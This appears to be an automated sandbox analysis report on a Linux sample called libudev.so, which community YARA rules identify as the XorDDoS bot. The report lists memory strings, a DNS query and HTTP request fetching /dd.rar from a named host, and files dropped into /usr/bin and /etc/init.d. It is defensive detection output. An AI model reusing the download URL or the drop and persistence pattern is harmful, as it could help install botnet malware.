Source: libudev.so, 6263.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6266.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6268.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6271.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6273.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ml
Source: libudev.so, 6495.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6498.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6501.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6503.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6506.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9mo
Source: libudev.so, 6407.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6410.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6413.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6415.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6418.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ti
Source: libudev.so, 6298.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6301.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6303.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6306.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6309.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9tr
Source: libudev.so, 6388.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6391.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6393.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6396.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6399.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9uh
Source: libudev.so, 6424.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6427.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6430.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6432.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6435.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ui
Source: libudev.so, 6369.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6372.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6375.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6377.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6380.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9yp
Source: libudev.so, 6548.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp, libudev.so, 6551.1.00000000ffc1f000.00000000ffc40000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9zp

Source: unknown

DNS traffic detected: queries for: www1.gggatat456.com

Source: global traffic

HTTP traffic detected: GET /dd.rar HTTP/1.1Accept: */*Accept-Language: zh-cnUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)Host: www1.gggatat456.comConnection: Keep-Alive

DDoS

Yara detected XorDDoS Bot

Source: Yara match	File source: libudev.so, type: SAMPLE
Source: Yara match	File source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6391.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6479.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6515.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6498.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6413.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6520.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6441.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6450.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6530.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6289.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6551.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6541.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6396.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6407.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6501.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6362.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6230.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6324.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6321.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6234.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6342.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6462.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6377.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6309.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6301.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6489.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6268.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6539.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6286.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6273.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6334.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6476.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6399.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6380.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6554.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6271.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6468.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6484.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6495.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6339.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6318.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6536.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6410.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6230, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6233, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6234, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6263, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6266, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6271, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6273, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6283, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6286, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6289, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6291, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6298, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6301, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6303, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6306, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6309, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6315, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6318, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6321, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6324, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6327, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6334, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6337, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6339, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6342, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6345, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6351, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6354, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6356, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6359, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6362, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6369, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6375, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6377, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6380, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6391, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6393, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6399, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6407, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6410, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6413, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6415, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6418, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6424, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6427, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6430, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6435, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6441, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6447, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6450, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6452, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6459, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6462, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6464, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6468, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6470, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6479, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6482, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: libudev.so PID: 6484, type: MEMORYSTR
Source: Yara match	File source: /usr/bin/hfdnmorvjd, type: DROPPED
Source: Yara match	File source: /usr/bin/ctwojuywol, type: DROPPED
Source: Yara match	File source: /usr/bin/cjrbrkowir, type: DROPPED
Source: Yara match	File source: /usr/bin/bnuowhwlvc, type: DROPPED
Source: Yara match	File source: /usr/bin/trcmbxxcta, type: DROPPED
Source: Yara match	File source: /usr/bin/fsqerkomug, type: DROPPED
Source: Yara match	File source: /usr/bin/chrcfbeejh, type: DROPPED
Source: Yara match	File source: /usr/bin/jjfbelholv, type: DROPPED
Source: Yara match	File source: /usr/bin/mljnlxkfff, type: DROPPED
Source: Yara match	File source: /usr/bin/tiupbsaswr, type: DROPPED
Source: Yara match	File source: /etc/init.d/libudev.so, type: DROPPED
Source: Yara match	File source: /usr/bin/uhyqxsqece, type: DROPPED
Source: Yara match	File source: /usr/bin/uijxdyxaco, type: DROPPED
Source: Yara match	File source: /usr/bin/ypclxoxcxk, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: libudev.so, type: SAMPLE	Matched rule: Detects XORDDoS Author: ditekSHen
Source: libudev.so, type: SAMPLE	Matched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
Source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6391.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6479.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6515.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6498.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6413.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6520.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6441.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6450.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6530.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6289.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6551.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6541.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6396.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6407.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6501.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6362.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6230.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6324.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6321.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6234.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6342.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6462.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6377.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6309.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6301.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6489.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6268.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6539.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6286.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6273.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6334.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6476.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6399.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6380.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6554.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6271.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6468.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6484.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6495.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
